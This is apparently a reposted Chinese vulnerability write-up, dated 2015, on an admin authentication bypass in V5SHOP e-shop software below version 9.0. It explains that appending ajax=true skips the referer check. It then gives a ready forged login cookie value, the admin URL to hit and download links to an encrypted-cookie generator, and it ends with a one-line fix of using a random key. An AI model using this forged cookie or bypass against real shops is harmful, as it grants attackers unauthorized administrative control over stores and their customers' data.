鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站安全 > 安全设置 > >

V5SHOP网店系统version < 9.0后台认证绕过

来源:互联网 作者:佚名 时间:2015-06-30 08:18
程序后台的访问控制: 1 获取cookie,使用秘钥解密。确定是否登录 2 监控referer,不过请求中带ajax=true,即可绕过限制 所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台 访问URL: www.xxxx.com/weblogin/index.aspx?ajax=true 伪造cookie
程序后台的访问控制:
 
1 获取cookie,使用秘钥解密。确定是否登录
 
2 监控referer,不过请求中带ajax=true,即可绕过限制
 
 
 
所以我们可以伪造一份加密的cooke,并携带ajax=true去直接访问后台
 
访问URL:
 
 
www.xxxx.com/weblogin/index.aspx?ajax=true
 
伪造cookie:
 
 
V5ShopLoginID=Z1zZmWmBQL7kg6bn1sIVSbI1tdLbyYJnhapJnu3MQKs=
 
 
 
加密cookie生成工具:
 
 
http://files.cnblogs.com/zpino/v5shop.rar
http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/09/v5shop.rar
 
 
 
 
修复方案:
 
随机秘钥 
 
上一篇:优酷P2P系统数据统计系统sql注入及修复
下一篇:cmseasy存储型xss及修复(代码分析)
网友评论
<
相关栏目
最近更新
你最喜欢的